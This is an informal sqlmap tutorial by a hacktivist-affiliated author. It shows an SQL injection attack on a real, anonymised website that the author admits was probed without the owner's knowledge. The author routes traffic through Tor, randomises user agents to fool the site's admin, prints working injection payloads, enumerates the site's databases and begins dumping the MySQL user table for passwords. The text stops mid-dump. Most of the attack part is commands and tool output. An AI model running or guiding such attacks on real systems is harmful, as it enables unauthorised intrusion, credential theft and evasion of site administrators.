getting started with sqlmap

1. Sqlmap Tutorial --
2. by gh0st
3.  
4. big shout out to my brothers at irc.anonops.li #antisec
5. especially DaMau55, Theory, and Storm -> what up guys!
6.  
7. WHO LOVES SQL INJECTION ?
8.  
9. Okay here we go...
10.  
11. Okay first of all what is sqlmap? Sqlmap is a script written in pyton that will save you so much time when it comes to sql injection attacks, with some amazing
12. features. Since sqlmap is written in python it is a very portable application meaning that it will work on any operating system that supports Python. Which means
13. that it will work in lamen terms on Windows and Linux and Unix based operating systems. Some of the featuers available are:
14.  
15. 1) takeover options
16. 2) bruteforcing -> for tables/columns
17. 3) database fingerprinting
18. 4) google dork search options
19. 4) command execution
20. 5) operating system shell option
21. 6) Proxy options
22. 7) Enumeration options
23. 8) password cracking options
24. 9) and so much more...
25.  
26. First lets get a printout of the sqlmap.py -h (help) output:
27.  
28.  
29. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
30. http://sqlmap.sourceforge.net
31.  
32. Usage: python ./sqlmap.py [options]
33.  
34. Options:
35. --version show program's version number and exit
36. -h, --help show this help message and exit
37. -v VERBOSE Verbosity level: 0-6 (default 1)
38.  
39. Target:
40. At least one of these options has to be specified to set the source to
41. get target urls from.
42.  
43. -d DIRECT Direct connection to the database
44. -u URL, --url=URL Target url
45. -l LOGFILE Parse targets from Burp or WebScarab proxy logs
46. -m BULKFILE Scan multiple targets enlisted in a given textual file
47. -r REQUESTFILE Load HTTP request from a file
48. -g GOOGLEDORK Process Google dork results as target urls
49. -c CONFIGFILE Load options from a configuration INI file
50.  
51. Request:
52. These options can be used to specify how to connect to the target url.
53.  
54. --data=DATA Data string to be sent through POST
55. --cookie=COOKIE HTTP Cookie header
56. --cookie-urlencode URL Encode generated cookie injections
57. --drop-set-cookie Ignore Set-Cookie header from response
58. --user-agent=AGENT HTTP User-Agent header
59. --random-agent Use randomly selected HTTP User-Agent header
60. --referer=REFERER HTTP Referer header
61. --headers=HEADERS Extra HTTP headers newline separated
62. --auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
63. --auth-cred=ACRED HTTP authentication credentials (name:password)
64. --auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)
65. --proxy=PROXY Use a HTTP proxy to connect to the target url
66. --proxy-cred=PCRED HTTP proxy authentication credentials (name:password)
67. --ignore-proxy Ignore system default HTTP proxy
68. --delay=DELAY Delay in seconds between each HTTP request
69. --timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
70. --retries=RETRIES Retries when the connection timeouts (default 3)
71. --scope=SCOPE Regexp to filter targets from provided proxy log
72. --safe-url=SAFURL Url address to visit frequently during testing
73. --safe-freq=SAFREQ Test requests between two visits to a given safe url
74.  
75. Optimization:
76. These options can be used to optimize the performance of sqlmap.
77.  
78. -o Turn on all optimization switches
79. --predict-output Predict common queries output
80. --keep-alive Use persistent HTTP(s) connections
81. --null-connection Retrieve page length without actual HTTP response body
82. --threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
83.  
84. Injection:
85. These options can be used to specify which parameters to test for,
86. provide custom injection payloads and optional tampering scripts.
87.  
88. -p TESTPARAMETER Testable parameter(s)
89. --dbms=DBMS Force back-end DBMS to this value
90. --os=OS Force back-end DBMS operating system to this value
91. --prefix=PREFIX Injection payload prefix string
92. --suffix=SUFFIX Injection payload suffix string
93. --tamper=TAMPER Use given script(s) for tampering injection data
94.  
95. Detection:
96. These options can be used to specify how to parse and compare page
97. content from HTTP responses when using blind SQL injection technique.
98.  
99. --level=LEVEL Level of tests to perform (1-5, default 1)
100. --risk=RISK Risk of tests to perform (0-3, default 1)
101. --string=STRING String to match in page when the query is valid
102. --regexp=REGEXP Regexp to match in page when the query is valid
103. --text-only Compare pages based only on the textual content
104.  
105. Techniques:
106. These options can be used to tweak testing of specific SQL injection
107. techniques.
108.  
109. --technique=TECH SQL injection techniques to test for (default BEUST)
110. --time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
111. --union-cols=UCOLS Range of columns to test for UNION query SQL injection
112. --union-char=UCHAR Character to use for bruteforcing number of columns
113.  
114. Fingerprint:
115. -f, --fingerprint Perform an extensive DBMS version fingerprint
116.  
117. Enumeration:
118. These options can be used to enumerate the back-end database
119. management system information, structure and data contained in the
120. tables. Moreover you can run your own SQL statements.
121.  
122. -b, --banner Retrieve DBMS banner
123. --current-user Retrieve DBMS current user
124. --current-db Retrieve DBMS current database
125. --is-dba Detect if the DBMS current user is DBA
126. --users Enumerate DBMS users
127. --passwords Enumerate DBMS users password hashes
128. --privileges Enumerate DBMS users privileges
129. --roles Enumerate DBMS users roles
130. --dbs Enumerate DBMS databases
131. --tables Enumerate DBMS database tables
132. --columns Enumerate DBMS database table columns
133. --schema Enumerate DBMS schema
134. --count Retrieve number of entries for table(s)
135. --dump Dump DBMS database table entries
136. --dump-all Dump all DBMS databases tables entries
137. --search Search column(s), table(s) and/or database name(s)
138. -D DB DBMS database to enumerate
139. -T TBL DBMS database table to enumerate
140. -C COL DBMS database table column to enumerate
141. -U USER DBMS user to enumerate
142. --exclude-sysdbs Exclude DBMS system databases when enumerating tables
143. --start=LIMITSTART First query output entry to retrieve
144. --stop=LIMITSTOP Last query output entry to retrieve
145. --first=FIRSTCHAR First query output word character to retrieve
146. --last=LASTCHAR Last query output word character to retrieve
147. --sql-query=QUERY SQL statement to be executed
148. --sql-shell Prompt for an interactive SQL shell
149.  
150. Brute force:
151. These options can be used to run brute force checks.
152.  
153. --common-tables Check existence of common tables
154. --common-columns Check existence of common columns
155.  
156. User-defined function injection:
157. These options can be used to create custom user-defined functions.
158.  
159. --udf-inject Inject custom user-defined functions
160. --shared-lib=SHLIB Local path of the shared library
161.  
162. File system access:
163. These options can be used to access the back-end database management
164. system underlying file system.
165.  
166. --file-read=RFILE Read a file from the back-end DBMS file system
167. --file-write=WFILE Write a local file on the back-end DBMS file system
168. --file-dest=DFILE Back-end DBMS absolute filepath to write to
169.  
170. Operating system access:
171. These options can be used to access the back-end database management
172. system underlying operating system.
173.  
174. --os-cmd=OSCMD Execute an operating system command
175. --os-shell Prompt for an interactive operating system shell
176. --os-pwn Prompt for an out-of-band shell, meterpreter or VNC
177. --os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
178. --os-bof Stored procedure buffer overflow exploitation
179. --priv-esc Database process' user privilege escalation
180. --msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
181. --tmp-path=TMPPATH Remote absolute path of temporary files directory
182.  
183. Windows registry access:
184. These options can be used to access the back-end database management
185. system Windows registry.
186.  
187. --reg-read Read a Windows registry key value
188. --reg-add Write a Windows registry key value data
189. --reg-del Delete a Windows registry key value
190. --reg-key=REGKEY Windows registry key
191. --reg-value=REGVAL Windows registry key value
192. --reg-data=REGDATA Windows registry key value data
193. --reg-type=REGTYPE Windows registry key value type
194.  
195. General:
196. These options can be used to set some general working parameters.
197.  
198. -s SESSIONFILE Save and resume all data retrieved on a session file
199. -t TRAFFICFILE Log all HTTP traffic into a textual file
200. --batch Never ask for user input, use the default behaviour
201. --charset=CHARSET Force character encoding used for data retrieval
202. --eta Display for each output the estimated time of arrival
203. --flush-session Flush session file for current target
204. --fresh-queries Ignores query results stored in session file
205. --save Save options on a configuration INI file
206. --update Update sqlmap
207.  
208. Miscellaneous:
209. --beep Alert when sql injection found
210. --check-payload IDS detection testing of injection payloads
211. --cleanup Clean up the DBMS by sqlmap specific UDF and tables
212. --forms Parse and test forms on target url
213. --gpage=GOOGLEPAGE Use Google dork results from specified page number
214. --mobile Imitate smartphone through HTTP User-Agent header
215. --page-rank Display page rank (PR) for Google dork results
216. --parse-errors Parse DBMS error messages from response pages
217. --replicate Replicate dumped data into a sqlite3 database
218. --tor Use default Tor (Vidalia/Privoxy/Polipo) proxy address
219. --wizard Simple wizard interface for beginner users
220.  
221.  
222.  
223. So many options right? Sqlmap can even be tied in with metasploit which i will try to cover at another time, for now i am going to go over some of my favorite options and this
224. is really just a quick start to get you familiar with sqlmap and how to start using it right away. Okay so what can we do with this great script? I will show you...
225.  
226. First option that we will discuss is the proxy option (--proxy)
227.  
228. sqlmap is able to connect to its target web server through a proxy, which is great when you are trying to hide your real ip address. Sqlmap even comes with the (--tor) option
229. so that if you have tor running on your operating system you can just use the --tor option and it will find either polipo/privoxy and connect to your target through your proxy.
230.  
231. I have written a very detailed tutorial on how to install/setup Tor on your linux system, if you have not read it i would suggest you check it out here:
232.  
233. Tor Tutorial written by gh0st:
234.  
235. http://pastebin.com/XhTx8n3b
236.  
237.  
238. Okay lets continue...
239.  
240. So for this tutorial the proxy that we will be using is Polipo from Tor. This is the syntax to have sqlmap connect to the target webserver through a proxy.
241.  
242. root@bt# python sqlmap.py --proxy="http://127.0.0.1:8118"
243.  
244. Okay now if you are not familiar with python scripts you need to add the word "python" infront of the script, (just like perl) or you can just use the ./ to run the script
245.  
246. root@bt# ./sqlmap.py --proxy="http://127.0.0.1:8118"
247.  
248.  
249. Here please notice that 127.0.0.1 = localhost which is where we are running Polipo and "8118" is the port that polipo is running on. We can verify this with the following
250. linux command:
251.  
252. root@bt:~# netstat -ntl
253. Active Internet connections (only servers)
254. Proto Recv-Q Send-Q Local Address Foreign Address State
255. tcp 0 0 127.0.0.1:8118 0.0.0.0:* LISTEN
256. tcp 0 0 127.0.0.1:9050 0.0.0.0:* LISTEN
257. tcp 0 0 127.0.0.1:7175 0.0.0.0:* LISTEN
258. tcp6 0 0 ::1:7175 :::* LISTEN
259.  
260.  
261.  
262. Okay so now we have Sqlmap connecting to our target webserver through a proxy, we have hidden our real ip address so we are safe. Another great option would be to trick the admin
263. of the target webserver in thinking that our connections/probing from sqlmap to his webserver is just different people connecting to his website. I will explain...
264.  
265. I know this will not be new information for some of you but for others this will be valuable information to them...
266.  
267. Okay when you connect to a webserver lets say its http://www.abc.com if you have a security conscience admin and he reviews his web logs, when a person is just connecting to
268. his website they are making a connection on Port 80. Port 80 is where a webserver such as apache is running.. So when he looks at his logs if he sees something like this...
269.  
270. "Mozilla 5.0 (X11; U; Linux i686; en-US; rv 1.9.2.10) Gecko 2121120043 Firefox 3.6.10"
271.  
272. that is what will show up in the logs with an ip address attached to it and its just a basic connection from a firefox web browser to a webserver. And when you browse through
273. the site different things will show up in the log, like (GET, POST, ETC ETC)
274.  
275. We can add trick the web admin into thinking that our probing and scanning from sqlmap could possibly be just a web browser browsing his website. Here is how we do this..
276.  
277. One of my favorite options on sqlmap..
278.  
279. --user-agent
280.  
281. it will look like this:
282.  
283. --user-agent="Mozilla 5.0 (X11; U; Linux i686; en-US; rv 1.9.2.10) Gecko 2121120043 Firefox 3.6.10"
284.  
285. we can do this to make the admin think that our sqlmap probing his website is just a firefox web browser. But instead of typing all that information, we can just use the
286. --random-agen option.
287.  
288. --random-agent -> this will generate random agents for each connection made, and when we are using a proxy it will look like different browser agents from different ip
289. addresses!
290.  
291. How great is that!
292.  
293.  
294. So lets put it all together now...
295.  
296.  
297. root@bt# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent
298.  
299.  
300. Okay so we are covered so far by hiding our ip address and now we have random agents being generated for each connection made to our target address. Feels good don't it?
301.  
302.  
303. Now lets get to the fun stuff! Lets find a target!
304.  
305. Before i disply the next steps know that sqlmap.py has the (-g) options which is for google dorks and sqlmap.py given the right syntax will access google to find you a target
306. matching the syntax you provide.
307.  
308.  
309.  
310. Okay we have a target lets get started...
311.  
312. All we need to do to provide a target for sqlmap to attack is provide this syntax:
313.  
314. root@bt# python sqlmap.py -u "target.com/news.php?id=11"
315.  
316.  
317. so the syntax -> -u "targetsitegoeshere.com"
318.  
319.  
320. now lets put it all together with our other options...
321.  
322.  
323. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6"
324.  
325. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
326. http://sqlmap.sourceforge.net
327.  
328. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
329.  
330. [*] starting at: 18:37:16
331.  
332. [18:37:16] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5
333. [18:37:16] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
334. [18:37:17] [INFO] testing connection to the target url
335. [18:37:21] [INFO] testing if the url is stable, wait a few seconds
336. [18:37:22] [INFO] url is stable
337. [18:37:22] [INFO] testing if GET parameter 'id' is dynamic
338. [18:37:23] [INFO] confirming that GET parameter 'id' is dynamic
339. [18:37:24] [INFO] GET parameter 'id' is dynamic
340. [18:37:25] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
341. [18:37:25] [INFO] testing sql injection on GET parameter 'id'
342. [18:37:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
343. [18:37:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
344. [18:37:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
345. [18:37:29] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
346. [18:37:29] [INFO] testing 'MySQL > 5.0.11 stacked queries'
347. [18:37:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
348. [18:38:11] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
349. [18:38:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
350. [18:38:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
351. GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] N
352. sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
353. ---
354. Place: GET
355. Parameter: id
356. Type: boolean-based blind
357. Title: AND boolean-based blind - WHERE or HAVING clause
358. Payload: id=6 AND 8517=8517
359.  
360. Type: error-based
361. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
362. Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
363.  
364. Type: AND/OR time-based blind
365. Title: MySQL > 5.0.11 AND time-based blind
366. Payload: id=6 AND SLEEP(5)
367. ---
368.  
369. [18:44:56] [INFO] manual usage of GET payloads requires url encoding
370. [18:44:56] [INFO] the back-end DBMS is MySQL
371.  
372. web application technology: Apache
373. back-end DBMS: MySQL 5.0
374. [18:44:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'
375.  
376. [*] shutting down at: 18:44:56
377.  
378.  
379. Okay now look above all we did was the following options broken down:
380.  
381. --proxy="http://127.0.0.1:8118" -> Polipo/Tor Proxy
382.  
383. --random-agent -> make it look like a web browser
384.  
385. -u "target.com/info.php?id=6" -> target
386.  
387.  
388. Okay so you know i am going to hide the real website that i used because i feel it just wouldn't be right to post this information especially without them knowing...
389.  
390. This is the line you should take notice from above...
391.  
392. GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] N
393.  
394. the site is vulnerable to sql injection... Do we want to try others? For this option you can almost always choose N because sqlmap has found what is injectable on the site
395. and sqlmap has determined that the site is MySQL so if you were to choose yes on this option it would try other sql types and it is not neccesary here..
396.  
397.  
398. MOVING ON!
399.  
400. Our current command line being used:
401.  
402. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6"
403.  
404.  
405. Next thing we are going to add to our command line is this option (--dbs)
406.  
407. --dbs -> Enumerate DBMS databases
408. -> DBMS = database management system
409.  
410.  
411. This option (--dbs) will search our target website for available databases, how great is this!
412.  
413. Here we go...
414.  
415. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --dbs
416.  
417. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
418. http://sqlmap.sourceforge.net
419.  
420. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
421.  
422. [*] starting at: 18:45:17
423.  
424. [18:45:17] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5
425. [18:45:17] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
426. [18:45:17] [INFO] resuming injection data from session file
427. [18:45:17] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
428. [18:45:18] [INFO] testing connection to the target url
429. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
430. ---
431. Place: GET
432. Parameter: id
433. Type: boolean-based blind
434. Title: AND boolean-based blind - WHERE or HAVING clause
435. Payload: id=6 AND 8517=8517
436.  
437. Type: error-based
438. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
439. Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
440.  
441. Type: AND/OR time-based blind
442. Title: MySQL > 5.0.11 AND time-based blind
443. Payload: id=6 AND SLEEP(5)
444. ---
445.  
446. [18:45:19] [INFO] manual usage of GET payloads requires url encoding
447. [18:45:19] [INFO] the back-end DBMS is MySQL
448.  
449. web application technology: Apache
450. back-end DBMS: MySQL 5.0
451. [18:45:19] [INFO] fetching database names
452. [18:45:20] [INFO] the SQL query used returns 26 entries
453. [18:45:20] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
454. [18:45:21] [INFO] retrieved: testpiotr
455. [18:45:22] [INFO] retrieved: test
456. [18:45:22] [INFO] retrieved: sma
457. [18:45:23] [INFO] retrieved: sale
458. [18:45:24] [INFO] retrieved: rk2009
459. [18:45:25] [INFO] retrieved: rk
460. [18:45:25] [INFO] retrieved: pathologistsmeetclinicians
461. [18:45:26] [INFO] retrieved: ncp
462. [18:45:27] [INFO] retrieved: mysql
463. [18:45:28] [INFO] retrieved: mydb
464. [18:45:29] [INFO] retrieved: lowers
465. [18:45:29] [INFO] retrieved: limesurvey
466. [18:45:30] [INFO] retrieved: lemon8xml
467. [18:45:32] [INFO] retrieved: idaho_test_usun
468. [18:45:33] [INFO] retrieved: ici_corporate
469. [18:45:34] [INFO] retrieved: grants
470. [18:45:35] [INFO] retrieved: fored2010
471. [18:45:36] [INFO] retrieved: egroupware
472. [18:45:36] [INFO] retrieved: db_test
473. [18:45:37] [INFO] retrieved: bugtracker
474. [18:45:38] [INFO] retrieved: blogic
475. [18:45:39] [INFO] retrieved: avea
476. [18:45:40] [INFO] retrieved: IC2
477. [18:45:41] [INFO] retrieved: information_schema
478. available databases [26]:
479. [*] avea
480. [*] blogic
481. [*] bugtracker
482. [*] db_test
483. [*] egroupware
484. [*] fored2010
485. [*] grants
486. [*] IC2
487. [*] ici_corporate
488. [*] idaho_test_usun
489. [*] information_schema
490. [*] lemon8xml
491. [*] limesurvey
492. [*] lowers
493. [*] mydb
494. [*] mysql
495. [*] ncp
496. [*] pathologistsmeetclinicians
497. [*] rk
498. [*] rk2009
499. [*] sale
500. [*] sma
501. [*] test
502. [*] testpiotr
503.  
504. [18:45:41] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'
505.  
506. [*] shutting down at: 18:45:41
507.  
508.  
509. WOW!!! Sqlmap has found 26 databases! A few of the databases have been removed to hide the identity of the website. Forgive me =-P
510.  
511.  
512. Okay well what now? Next we need to do a little digging, and we need to find some good tables and columns so we can exploit this website. Lets start with the database
513.  
514. [*] mydb
515.  
516. We are going to see what is in the database (mydb)
517.  
518. we are going to add these options to our command line:
519.  
520. -D mydb -> this tells sqlmap to use the database mydb (-D) options is for databse
521.  
522. --tables -> this tells sqlmap to search for tables in the (mydb) database
523.  
524.  
525. NOTE: because the database [*]information_schema is available we are able to get databases/tables/columns right away. If for whatever reason this database was not available
526. to us then sqlmap would use a bruteforce attack trying 30,000+ common table names to try and find other tables/columns and do note that this can take awile.
527.  
528. MOVNIG ON!
529.  
530.  
531. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --tables -D mydb
532.  
533. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
534. http://sqlmap.sourceforge.net
535.  
536. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
537.  
538. [*] starting at: 18:46:51
539.  
540. [18:46:51] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322)
541. [18:46:51] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
542. [18:46:51] [INFO] resuming injection data from session file
543. [18:46:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
544. [18:46:51] [INFO] testing connection to the target url
545. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
546. ---
547. Place: GET
548. Parameter: id
549. Type: boolean-based blind
550. Title: AND boolean-based blind - WHERE or HAVING clause
551. Payload: id=6 AND 8517=8517
552.  
553. Type: error-based
554. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
555. Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
556.  
557. Type: AND/OR time-based blind
558. Title: MySQL > 5.0.11 AND time-based blind
559. Payload: id=6 AND SLEEP(5)
560. ---
561.  
562. [18:46:52] [INFO] manual usage of GET payloads requires url encoding
563. [18:46:52] [INFO] the back-end DBMS is MySQL
564.  
565. web application technology: Apache
566. back-end DBMS: MySQL 5.0
567. [18:46:52] [INFO] fetching tables for database: mydb
568. [18:46:54] [INFO] the SQL query used returns 2 entries
569. [18:46:54] [INFO] retrieved: mydb
570. [18:46:55] [INFO] retrieved: WORKER
571. [18:46:56] [INFO] retrieved: mydb
572. [18:46:57] [INFO] retrieved: COMPANY
573. Database: mydb
574. [2 tables]
575. +---------+
576. | COMPANY |
577. | WORKER |
578. +---------+
579.  
580. [18:46:57] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'
581.  
582. [*] shutting down at: 18:46:57
583.  
584.  
585. Okay as you can hopefully see that there is only 2 tables available to us on DATABASE mydb, and there is nothing sexy or usefull here so we will move on...
586.  
587.  
588. NOTE: one thing i would like you to notice is that sqlmap.py logs all information and sessions to the following directory under backtrack linux:
589.  
590. sqlmap logs output to directory -> /pentest/database/sqlmap/output/www.targetwebsite.com
591.  
592. So you can find all information and recordings of everything in that directory, this is very important!!
593.  
594.  
595. MOVING ON!!
596.  
597. We need to pick another database to enumerate so i will try the database (mysql)
598.  
599.  
600. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --tables -D mysql
601.  
602. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
603. http://sqlmap.sourceforge.net
604.  
605. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
606.  
607. [*] starting at: 18:47:55
608.  
609. [18:47:55] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Opera/9.22 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru)
610. [18:47:55] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
611. [18:47:55] [INFO] resuming injection data from session file
612. [18:47:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
613. [18:47:55] [INFO] testing connection to the target url
614. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
615. ---
616. Place: GET
617. Parameter: id
618. Type: boolean-based blind
619. Title: AND boolean-based blind - WHERE or HAVING clause
620. Payload: id=6 AND 8517=8517
621.  
622. Type: error-based
623. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
624. Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
625.  
626. Type: AND/OR time-based blind
627. Title: MySQL > 5.0.11 AND time-based blind
628. Payload: id=6 AND SLEEP(5)
629. ---
630.  
631. [18:48:03] [INFO] manual usage of GET payloads requires url encoding
632. [18:48:03] [INFO] the back-end DBMS is MySQL
633.  
634. web application technology: Apache
635. back-end DBMS: MySQL 5.0
636. [18:48:03] [INFO] fetching tables for database: mysql
637. [18:48:04] [INFO] the SQL query used returns 18 entries
638. [18:48:05] [INFO] retrieved: mysql
639. [18:48:05] [INFO] retrieved: user_info
640. [18:48:06] [INFO] retrieved: mysql
641. [18:48:07] [INFO] retrieved: user
642. [18:48:07] [INFO] retrieved: mysql
643. [18:48:08] [INFO] retrieved: time_zone_transition_type
644. [18:48:09] [INFO] retrieved: mysql
645. [18:48:09] [INFO] retrieved: time_zone_transition
646. [18:48:10] [INFO] retrieved: mysql
647. [18:48:10] [INFO] retrieved: time_zone_name
648. [18:48:11] [INFO] retrieved: mysql
649. [18:48:12] [INFO] retrieved: time_zone_leap_second
650. [18:48:12] [INFO] retrieved: mysql
651. [18:48:13] [INFO] retrieved: time_zone
652. [18:48:14] [INFO] retrieved: mysql
653. [18:48:14] [INFO] retrieved: tables_priv
654. [18:48:15] [INFO] retrieved: mysql
655. [18:48:16] [INFO] retrieved: procs_priv
656. [18:48:17] [INFO] retrieved: mysql
657. [18:48:17] [INFO] retrieved: proc
658. [18:48:18] [INFO] retrieved: mysql
659. [18:48:19] [INFO] retrieved: host
660. [18:48:19] [INFO] retrieved: mysql
661. [18:48:20] [INFO] retrieved: help_topic
662. [18:48:21] [INFO] retrieved: mysql
663. [18:48:29] [INFO] retrieved: help_relation
664. [18:48:30] [INFO] retrieved: mysql
665. [18:48:31] [INFO] retrieved: help_keyword
666. [18:48:31] [INFO] retrieved: mysql
667. [18:48:32] [INFO] retrieved: help_category
668. [18:48:33] [INFO] retrieved: mysql
669. [18:48:33] [INFO] retrieved: func
670. [18:48:34] [INFO] retrieved: mysql
671. [18:48:35] [INFO] retrieved: db
672. [18:48:35] [INFO] retrieved: mysql
673. [18:48:36] [INFO] retrieved: columns_priv
674. Database: mysql
675. [18 tables]
676. +---------------------------+
677. | columns_priv |
678. | db |
679. | func |
680. | help_category |
681. | help_keyword |
682. | help_relation |
683. | help_topic |
684. | host |
685. | proc |
686. | procs_priv |
687. | tables_priv |
688. | time_zone |
689. | time_zone_leap_second |
690. | time_zone_name |
691. | time_zone_transition |
692. | time_zone_transition_type |
693. | user |
694. | user_info |
695. +---------------------------+
696.  
697. [18:48:36] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'
698.  
699. [*] shutting down at: 18:48:36
700.  
701.  
702. FINALLY!!!!
703.  
704. We have found a usefull table now! While i would love to see and 'admin' table, the 'user' table does get me happy! Now that we have found a good table we need to find the
705. columns in the table and maybe we can find some passwords as well!
706.  
707. We are going to add the following options to our command line:
708.  
709. -D mysql -> use database mysql
710.  
711. -T user -> use table user_info
712.  
713. --dump -> dump all the columns you find in table user
714.  
715.  
716. Okay here is what our command line will look like now...
717.  
718.  
719. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" -D mysql -T user --dump
720.  
721. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
722. http://sqlmap.sourceforge.net
723.  
724. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
725.  
726. [*] starting at: 18:49:04
727.  
728. [18:49:04] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; fr-be; rv:1.9.0.8) Gecko/2009073022 Ubuntu/9.04 (jaunty) Firefox/3.0.13
729. [18:49:05] [INFO] using '/pentest/database/sqlmap/output/www.indexcHIDEN.com/session' as session file
730. [18:49:05] [INFO] resuming injection data from session file
731. [18:49:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
